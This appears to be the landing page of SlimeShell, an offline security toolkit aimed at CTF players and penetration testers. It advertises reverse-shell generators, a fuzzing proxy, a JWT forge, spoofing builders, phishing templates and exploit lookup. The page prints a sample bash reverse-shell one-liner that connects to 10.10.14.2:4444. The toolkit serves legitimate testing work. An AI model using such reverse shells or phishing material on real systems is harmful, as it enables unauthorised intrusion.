βββββββββββ βββββββ βββββββββββββββββββββββ ββββββββββββββ βββ βββββββββββ ββββββββ ββββββββββββββββββββββββ ββββββββββββββ βββ βββββββββββ ββββββββββββββββββββ ββββββββββββββββββββββ βββ βββ βββββββββββ ββββββββββββββββββββ ββββββββββββββββββββββ βββ βββ ββββββββββββββββββββββ βββ ββββββββββββββββββββββ βββββββββββββββββββββββββββ ββββββββββββββββββββββ ββββββββββββββββββββββ βββββββββββββββββββββββββββ
45+ tools across encoding, crypto, rev shells, proxy fuzzing, OSINT and forensics. Offline-first, client-side everything β no servers, no telemetry, no cloud.
$ git clone https://github.com/L-ubu/SlimeShell.git && cd SlimeShell && npm install && npm run tauri dev
Dashboard to scripts to terminal to payload β no more forty browser tabs with base64 decoders and revshell cheatsheets. It's all here, and it all works on a plane.
SLIMESHELL β toolkit overview Encode & Decode 52+ transforms Β· JWT debugger Β· stego Β· deobfuscator Generators rev shells (20+ langs) Β· wordlists Β· listener builder Analysis headers Β· IP lookup Β· forensics Β· nmap builder Offensive proxy suite Β· intruder fuzzing Β· spoofing Β· AI injection Intel CVE search Β· Exploit-DB Β· 300+ payloads Β· OSINT $ revshell --lang bash --host 10.10.14.2 --port 4444 bash -i >& /dev/tcp/10.10.14.2/4444 0>&1 encoded variants: base64 Β· url Β· hex β copied
Chain 52+ transforms β Base64, hex, URL, Unicode, ROT13, Morse, Braille, XOR β and watch each step live.
Burp-like repeater, intruder with marker-based fuzzing, decoder chain and sequencer. No license dialog.
One-liners for 20+ languages and platforms, with encoding variants and a listener command builder.
Hashing, XOR brute-force, known-plaintext attacks, frequency analysis, Vigenère and classical ciphers.
NVD CVE search, an offline Exploit-DB browser, CVSS calculator and a searchable vuln database.
Reference guide and payload library for your favorite dolphin. Pairs nicely with flipper-portals.
A sample β the app ships 45+ tools across 17 pages.
| Category | Highlights |
|---|---|
Encode/Decode | Multi-step pipelines, JWT forge (alg:none, HS256), deobfuscator |
Steganography | LSB image stego, bit-plane viewer, EXIF, zero-width text, homoglyphs |
Offensive | Intruder fuzzing, phishing templates, DNS/ARP/MAC spoof builders |
Passwords | Hash identifier, Hashcat/John command builder, rule engine |
Network | nmap builder, subnet calc, port reference, TCP flags |
API testing | HTTP client with collections, env vars and history |
Reference | Cheatsheets, social-engineering guides, methodology |
The decisions worth knowing about, written down.
Client networks are locked down. CTF boxes have no internet. SlimeShell doesn't care β everything runs client-side in a Tauri shell.
A security tool that phones home is a contradiction. There is no analytics, no crash reporting, no account system.
The payload library, the cheatsheets, the Flipper section β they exist because they were needed at 1 AM mid-challenge.